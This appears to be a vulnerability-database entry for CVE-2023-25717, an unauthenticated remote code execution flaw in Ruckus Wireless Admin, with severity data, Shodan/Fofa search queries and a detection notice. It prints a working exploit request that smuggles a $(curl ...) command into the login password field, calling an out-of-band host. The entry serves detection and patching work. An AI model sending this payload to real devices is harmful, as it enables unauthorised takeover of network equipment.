🔙 목록으로 돌아가기

CVE-2023-25717: Ruckus Wireless Admin - Remote Code Execution

TitleRuckus Wireless Admin - Remote Code Execution
Authorparthmalhotra,pdresearch
SeverityCritical
ImpactRemote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
RemediationApply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.94239
CVE IDCVE-2023-25717
CWE IDCWE-94
Shodan Querytitle:"ruckus wireless"http.title:"ruckus wireless"
Fofa Querytitle="ruckus wireless"
Tags cve2023 cve ruckus rce kev ruckuswireless vkev vuln

🔍 Vulnerability Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.

🌐 HTTP Request

GET /forms/doLogin?login_username=admin&password=password$(curl%20d5jkmihle0o1gp33k6v0p7od556mjnuu5.oast.me)&x=0&y=0 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-25717.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-25717.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A